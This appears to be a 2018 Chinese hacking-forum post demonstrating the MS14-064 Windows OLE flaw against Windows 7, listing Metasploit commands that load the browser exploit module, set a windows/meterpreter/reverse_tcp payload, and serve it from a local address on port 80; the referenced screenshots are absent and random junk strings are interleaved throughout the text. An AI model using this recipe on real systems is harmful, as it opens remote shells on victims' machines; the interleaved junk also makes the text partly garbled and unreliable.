找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1396|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 @ f6 D Q' y 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ' x7 A2 B% P4 t3 _" V8 V3 G. z

4 Y/ U4 o; Z" S! T% R

. @" k: J: {. G7 B 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ' T$ w3 f4 f" K

3 J7 |' n4 E! ^" c9 c5 U+ }

5 L( U, a# M1 c7 [' U 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp! j9 D" t# P1 `7 u! P6 c- T, \

' j; @& J0 D5 x v. _5 y

" B( g2 w; A# B5 L& `             set AllowPowershellPrompt true 4 }1 S& s; \; J' Q$ C0 f

% N2 {; H$ ^& w7 F# }' s

5 n" k+ T r, X& `+ d             Set LHOST 192.168.0.109! l' I! h" }3 C( M

, ` o, Z$ I4 l- z

5 B7 x- [* t, f             set SRVHOST 192.168.0.109 " q' f0 p1 L9 w+ v

- M! i- Z2 a- H% k# P7 P

4 k$ \, M# n- k1 Q" ^0 M             Set uripath share. Q; g9 A$ i+ s: k& |9 J& q

' C M* o5 q4 `

}8 i; e* u5 C# e' F             Set srvport 80 ! |7 O- R" ?8 s9 @; K0 D/ T

# N; d' W) r J9 |* ~

+ j+ i& a I% d; E3 I) z4 V) K   ! q! W; \7 ?1 N* [# @3 e

# u- Y! u! q. _. u

- C2 E$ ^% l7 r  2 z: s* O. R7 l6 ^; L# M& E

; i+ A; @ m% a$ a6 F+ G

; ?' t4 Y5 t: g4 V2 F8 I& I   * p7 N) p; a8 e3 x f8 f* [0 K

; s L, t5 g2 ?3 {% X9 A. [4 O2 |

r, }! i! e9 w- W- o4 P) g" w( b  5 w% S4 ~8 q/ Y" R& l+ Y

. o% \) Y9 J! y5 v: x J' n

$ z; C8 g( x* h3 I7 o. v3 B  $ \! ~& K; W- z% E4 c3 w! t

, n2 n. C8 T; D- p! }& |

# t+ D/ Q( |. h5 Q) f 下面我们来访问本地地址如图:, X* n( B! n2 \/ c- z

3 K: F; t/ p& r ]1 e" d( r

2 {* I) s' J; K; D, J; T3 k  6 ^2 [9 \7 h/ v7 @6 i

% l" x8 j; W0 m& v: h% E! o" w+ c/ j

9 h5 Z! _$ ]) q% g. t. r; }1 p   2 Q! e; @& S* N; f# c

8 j3 P, t3 I0 p; ?6 g+ Q

; k5 G- @9 J. W$ T# j3 o6 s 7 Q4 o3 u; \' }3 j8 o

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表